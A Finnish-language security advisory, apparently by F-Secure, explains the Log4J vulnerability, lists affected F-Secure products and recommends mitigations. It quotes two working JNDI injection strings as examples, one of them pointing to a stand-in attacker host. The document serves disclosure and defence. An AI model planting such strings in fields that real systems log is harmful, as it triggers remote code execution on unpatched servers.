Mitä Log4J -haavoittuvuudesta täytyy tietää?
Perjantaina 10. joulukuuta tunnistettu Log4J -haavoittuvuus vaikuttaa ohjelmistotoimittajiin ja palveluntarjoajiin ympäri maailmaa. Tietoturvaheikkous kohdistuu standardin mukaiseen menetelmään käsitellä lokiviestejä ohjelmistoissa. Tämä kosketta hyvin laajaa ja monipuolista joukkoa ohjelmistoja, esimerkiksi verkkokauppa-alustoja ja Minecraftia.
Haavoittuvuus voi ilmetä monessa eri paikassa ja vaikeasti ennakoitavilla tavoilla. Jos haavoittuvuuteen kohdistuva käyttäjän ohjaama merkkijono kirjataan lokiin, hyväksikäyttö voidaan suorittaa etänä. Yksinkertaisesti kuvattuna hyökkääjä voi käyttää haavoittuvuutta saadakseen kohdejärjestelmän noutamaan ja suorittamaan koodia etänä. Se mitä haitallinen koodi tekee, on täysin hyökkääjän päätettävissä.
Iso hässäkkä
Tämä isoksi paisunut hässäkkä on muistutus siitä, kuinka vaikeaa on turvata useita yritysohjelmistokerroksia. Vanhat ohjelmistot, mukaan lukien Java-versiot, pakottavat monet organisaatiot kehittämään omia korjaustiedostoja tai estämään korjaamasta niitä välittömästi. Toinen hankaluus johtuu haasteesta korjata Log4j:n lokitoiminnot oikein reaaliajassa juuri silloin, kun hyökkäyksen uhka on suuri ja kirjaaminen on välttämätöntä.
Kaikki suositellut mitigaatiot tulisi soveltaa “välittömästi”, Cybersecurity & Infrastructure Security Agency vaati blogikirjoituksessaan.
Yksittäiset käyttäjät eivät voi tehdä paljon muuta kuin asentaa päivityksiä eri verkkopalveluihin, kun ne tulevat saataville. Yritykset ja yritykset työskentelevät kuitenkin keskeytyksettä tarjotakseen korjauspäivityksiä samalla kun ne turvaavat omaa ympäristöään. Ja kun altistuminen on saatu hallintaan, on ryhdyttävä arvioimaan onko kyseisissä järjestelmissä käynnissä aktiivinen tapahtuma.
Haavoittuvuuksia melkein missä tahansa
Sovelluksen löytäminen, joka ei käytä Log4J-kirjastoa voi olla vaikeaa. Tämä kaikkialla läsnäolo tarkoittaa, että hyökkääjät voivat etsiä haavoittuvuuksia melkein mistä tahansa.
– En suosittele vaihtamaan Teslasi tai iPhone-puhelimesi nimeksi ${jndi:ldap://url/a}, jos haluat välttää yllättäviä tilanteita, F-Securen tietoturvajohtaja Erka Koivunen sanoi puoli-vitsillä.
Log4J:n muotoilukielen käyttö voi laukaista koodin haavoittuvissa sovelluksissa ympäri maailmaa. Esimerkiksi pelkkä lauseen, kuten “${jndi:ldap://attacker.com/pwnyourserver}” mainitseminen Minecraft-chatissa korjaamattomassa järjestelmässä, voi laukaista tietoturvaongelman Microsoftissa.
Vaikuttaako tämä F-Securen tuotteisiin?
F-Secure on havainnut, että tämä haavoittuvuus vaikuttaa seuraaviin tuotteisiin:
- F-Secure Policy Manager
- F-Secure Policy Manager Proxy
- F-Secure Endpoint Proxy
- F-Secure Elements Connector
Näiden tuotteiden sekä Windows- että Linux-versiot ovat altistuneet. Jos F-Secure-tuotteesi on avoimena Internetiin, TÄYTYY se heti tarkistaa ja tarvittaessa suorittaa korjauspäivitykset.
Kuinka voin suorittaa korjauspäivitykset F-Secure-tuotteeseeni?
F-Secure on tehnyt tietoturvakorjauksen tätä haavoittuvuutta varten. Löydät nämä ohjeet ja jatkuvat päivitykset tästä haavoittuvuudesta täältä.
Mitä toimenpiteitä sinun tulisi tehdä kaikissa ohjelmistoissa toimittajasta riippumatta?
- Rajoittaa pääsyä verkkoon tai sallia pääsy vain luotettaviin sivustoihin. Jos järjestelmäsi ei pysty muodostamaan yhteyttä Internetiin haitallisen koodin hakemiseksi, hyökkäys epäonnistuu.
- Tarkista säännöllisesti toimittajilta, onko saatavilla tietoa korjauksista ja muista haavoittuvuuksiin liittyvistä mitigaatioista.
- Harkitse F-Securen Elements Vulnerability Managementia, joka voi auttaa tunnistamaan haavoittuvat järjestelmät.
- Harkitse F-Secure Elements Endpoint Protection- tai F-Secure Business Suite -tuotteita, jotka voivat havaita ja korjata haavoittuvia ohjelmistoja järjestelmässä, johon ne on asennettu.
Kategoriat